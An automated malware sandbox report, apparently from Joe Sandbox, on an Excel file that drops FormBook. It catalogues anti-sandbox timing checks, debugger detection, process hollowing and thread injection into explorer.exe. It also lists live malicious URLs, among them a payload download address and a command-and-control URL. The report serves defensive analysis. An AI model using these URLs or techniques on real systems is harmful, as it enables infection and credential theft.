Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000002118604 second address: 000000000211860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000211899E second address: 00000000021189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003BC8604 second address: 0000000003BC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003BC899E second address: 0000000003BC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003A18604 second address: 0000000003A1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003A1899E second address: 0000000003A189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D734	4_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0042D734	7_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042D734	10_2_0042D734

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2812	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2128	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Odhbljup.exe TID: 1184	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Odhbljup.exe TID: 1712	Thread sleep time: -120000s >= -30000s	Jump to behavior

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D734		4_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042D734		10_2_0042D734

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_02E966E8 rdtsc

0_2_02E966E8

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\Public\vbc.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	4_2_004505B0
Source: C:\Users\user\Odhbljup.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	7_2_004505B0
Source: C:\Users\user\Odhbljup.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	10_2_004505B0

Source: explorer.exe, 00000006.00000000.544520820.00000000045D6000.00000004.00000001.sdmp

Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004244DC GetSystemInfo,

4_2_004244DC

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	4_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	10_2_004057AC

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,

4_2_00459820

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 12_2_01FD26F8 mov eax, dword ptr fs:[00000030h]

12_2_01FD26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_02E966E8 rdtsc

0_2_02E966E8

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,

12_2_01FC00C4

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 87.98.234.164 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.urzeczenie.com

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 870000

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\vbc.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_00405984
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_004062CC
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,GetACP,	4_2_0040CAF8
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_0040B4DC
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_0040B528
Source: C:\Users\Public\vbc.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_00405A8F
Source: C:\Users\user\Odhbljup.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405984
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_004062CC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,GetACP,	7_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_0040B528
Source: C:\Users\user\Odhbljup.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405A8F
Source: C:\Users\user\Odhbljup.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_00405984
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_004062CC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,GetACP,	10_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_0040B528
Source: C:\Users\user\Odhbljup.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_00405A8F

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00409F7C GetLocalTime,

4_2_00409F7C

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0043DD6C GetVersion,

4_2_0043DD6C

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.98.234.164	urzeczenie.com	France		16276	OVHFR	false
13.250.31.113	unknown	United States		16509	AMAZON-02US	true

Contacted Domains

Name	IP	Active
urzeczenie.com	87.98.234.164	true
www.voucheraja.com	unknown	unknown
onedrive.live.com	unknown	unknown
www.urzeczenie.com	unknown	unknown
prigmg.am.files.1drv.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig==	true	Avira URL Cloud: malware	unknown
http://13.250.31.113/7009/binso.exe	true	Avira URL Cloud: malware	unknown
www.heidecide.xyz/hno0/	true	Avira URL Cloud: phishing	low

AV Detection:

Antivirus detection for URL or domain

Source: http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig==	Avira URL Cloud: Label: malware
Source: http://13.250.31.113/7009/binso.exe	Avira URL Cloud: Label: malware
Source: www.heidecide.xyz/hno0/	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp

Multi AV Scanner detection for submitted file

Source: 7009.xlsx	Virustotal: Detection: 35%			Perma Link
Source: 7009.xlsx	ReversingLabs: Detection: 40%

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\Odhbljup.exe	ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 35%

Machine Learning detection for dropped file

Source: C:\Users\user\Odhbljup.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.3.vbc.exe.315eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.107.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.165.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.106.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.246.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310e80.52.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3152c8.112.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d710a4.42.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cebffc.148.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.249.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79768.59.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.139.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ca4.264.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.74.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cdcd68.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced598.275.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64370.24.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cefb84.27.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.90.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31914c.181.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b18.61.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cf84.239.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81f44.282.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.15.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.133.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.34.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.30cd68.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.133.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331c54.260.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec008.207.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.268.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ef4.277.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.37.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.156.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d010fc.238.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60e80.53.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32d0a8.94.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d685dc.151.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.205.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.215.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cece70.235.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.130.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced594.281.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.197.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.271.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e0c8.115.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68b08.36.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321414.55.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.68.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9f90.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.206.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.209.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.12.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.268.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf4008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.123.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314008.64.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d594.279.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01f44.282.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.209.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321b2c.121.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8d98.157.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.147.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b78.257.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.275.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.79.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ef4.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6932c.191.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.100.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf93d4.174.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
